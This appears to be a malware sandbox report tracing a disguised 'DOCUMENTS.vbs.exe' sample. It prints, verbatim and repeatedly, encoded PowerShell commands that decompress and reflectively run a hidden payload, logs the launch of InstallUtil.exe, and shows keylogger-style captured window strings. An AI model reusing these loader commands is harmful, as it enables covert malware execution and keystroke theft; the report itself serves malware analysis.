dwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "c:\users\user\desktop\documents.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\DOCUMENTS.vbs.exe "c:\users\user\desktop\documents.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe "c:\users\user\appdata\roaming\nwjbuywyew.vbs.exe" -enc jaboahaazqbnahcaygbpagqaaabzagiaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqavab5ahuabqbpahiabqb1aguaeabwacaapqagagcazqb0ac0aywbvag4adablag4adaagacqatgbwaguazwb3agiaaqbkaggacwbiacaafaagafmazqbsaguaywb0ac0atwbiagoazqbjahqaiaataewayqbzahqaiaaxadsaiaakaekayqb3ahcacqbmahcabwbiagcabqagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabuahkadqbtagkacgbtahuazqb4ahaalgbsaguacabsageaywblacgajwbsaeuatqagaccalaagaccajwapac4augblahaababhagmazqaoaccaqaanacwaiaanaeeajwapackaowakae4aaab5ag4aawb0agoacqbiahgaegagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqaoacaalaagacqasqbhahcadwbxagyadwbvagiazwbtacaakqa7acqatwbzahyazgb6aguacwb5acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauae0azqbtag8acgb5afmadabyaguayqbtadsajabdahaaygb5ag4acabuahyaawb6acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakae4aaab5ag4aawb0agoacqbiahgaegasacaakabbaekatwauaemabwbtahaacgblahmacwbpag8abgauaemabwbtahaacgblahmacwbpag8abgbnag8azablaf0aoga6aeqazqbjag8abqbwahiazqbzahmakqa7acqaqwbwagiaeqbuahaabgb2agsaegauaemabwbwahkavabvacgaiaakae8acwb2agyaegblahmaeqagackaowakaemacabiahkabgbwag4adgbrahoalgbdagwabwbzaguakaapadsajaboaggaeqbuagsadabqaheaygb4ahoalgbdagwabwbzaguakaapadsawwbiahkadablafsaxqbdacaajabjageadwb3aheazgb3ag8aygbnag0aiaa9acaajabpahmadgbmahoazqbzahkalgbuag8aqqbyahiayqb5acgakqa7afsaqqbyahiayqb5af0aoga6afiazqb2aguacgbzaguakaakaekayqb3ahcacqbmahcabwbiagcabqapadsaiaakafqacqbvaggabwbqahqaiaa9acaawwbtahkacwb0aguabqauafqaaabyaguayqbkagkabgbnac4avaboahiazqbhagqaxqa6adoarwblahqarabvag0ayqbpag4akaapac4atabvageazaaoacqasqbhahcadwbxagyadwbvagiazwbtackaowagacqarabjagiaagb3acaapqagacqavabxag8aaabvagoadaauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakaeqaywbiagoadwauaeqazqbjagwayqbyagkabgbnafqaeqbwagualaagacqarabjagiaagb3ac4atgbhag0azqapac4arab5ag4ayqbtagkaywbjag4adgbvagsazqaoackaiab8acaatwb1ahqalqboahuababsaa==

Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q3<b>[ Program Manager]</b> (03/09/2024 01:58:55)<br>
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q9<b>[ Program Manager]</b> (03/09/2024 01:58:55)<br>{Win}rTH
Source: InstallUtil.exe, 00000007.00000002.1790656213.00000000031F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q8<b>[ Program Manager]</b> (03/09/2024 01:58:55)<br>{Win}TH

Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DOCUMENTS.vbs.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
